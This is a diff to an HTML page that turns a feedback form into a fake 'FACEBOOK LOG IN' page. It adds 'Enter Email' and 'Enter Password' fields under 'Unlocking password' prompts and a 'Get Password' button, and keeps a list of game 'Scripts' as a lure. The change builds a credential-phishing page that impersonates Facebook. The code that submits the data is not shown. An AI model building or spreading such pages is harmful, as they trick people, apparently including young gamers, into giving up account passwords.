--- a/index.html
+++ b/index.html
@@ -24,7 +24,7 @@ body{
 /* Card */
 .box{
   background:white;
-  max-width:420px;
+  max-width:360px;
   margin:30px auto;
   padding:20px;
   border-radius:8px;
@@ -83,7 +83,7 @@ button:active{opacity:.85}
 
 <body>
 
-<div class="header">Feedback</div>
+<div class="header">FACEBOOK LOG IN</div>
 
 <!-- LOADING -->
 <div class="box" id="loadingBox">
@@ -94,16 +94,16 @@ button:active{opacity:.85}
 
 <!-- FEEDBACK 1 -->
 <div class="box hidden" id="feedback1Box">
-  <div class="small">Tell us the problem</div>
-  <textarea id="feedback1" placeholder="Error / issue"></textarea>
-  <button onclick="nextFeedback()">Next</button>
+  <div class="small">Unlocking password 1/2</div>
+  <textarea id="feedback1" placeholder="Enter Email"></textarea>
+  <button onclick="nextFeedback()">GO</button>
 </div>
 
 <!-- FEEDBACK 2 -->
 <div class="box hidden" id="feedback2Box">
-  <div class="small">How should we fix it?</div>
-  <textarea id="feedback2" placeholder="Suggestion / fix"></textarea>
-  <button onclick="submitFeedback()">Submit</button>
+  <div class="small">Unlocking password 2/2<?</div>
+  <textarea id="feedback2" placeholder="Enter Password"></textarea>
+  <button onclick="submitFeedback()">Get Password</button>
 </div>
 
 <!-- PASSWORD -->
@@ -123,13 +123,13 @@ button:active{opacity:.85}
 <!-- SCRIPT LIST -->
 <div class="box hidden" id="scriptBox">
   <h3>Scripts</h3>
-  <button onclick="alert('NO SCRIPT')">Super Bear Adventure</button>
-  <button onclick="alert('NO SCRIPT')">Gym Idle Clicker</button>
-  <button onclick="alert('NO SCRIPT')">Counter Terrorist Strike</button>
-  <button onclick="alert('NO SCRIPT')">Heroes Strike</button>
-  <button onclick="alert('NO SCRIPT')">Magica.io</button>
-  <button onclick="alert('NO SCRIPT')">Obby Parkour</button>
-  <button onclick="alert('NO SCRIPT')">Mobile Legends Bang Bang</button>
+  <button onclick="alert('NO SCRIPT')">🎮Super Bear Adventure</button>
+  <button onclick="alert('NO SCRIPT')">🎮Gym Idle Clicker</button>
+  <button onclick="alert('NO SCRIPT')">🎮Counter Terrorist Strike</button>
+  <button onclick="alert('NO SCRIPT')">🎮Heroes Strike</button>
+  <button onclick="alert('NO SCRIPT')">🎮Magica.io</button>
+  <button onclick="alert('NO SCRIPT')">🎮Obby Parkour</button>
+  <button onclick="alert('NO SCRIPT')">🎮Mobile Legends Bang Bang</button>
 </div>
 
 <script>
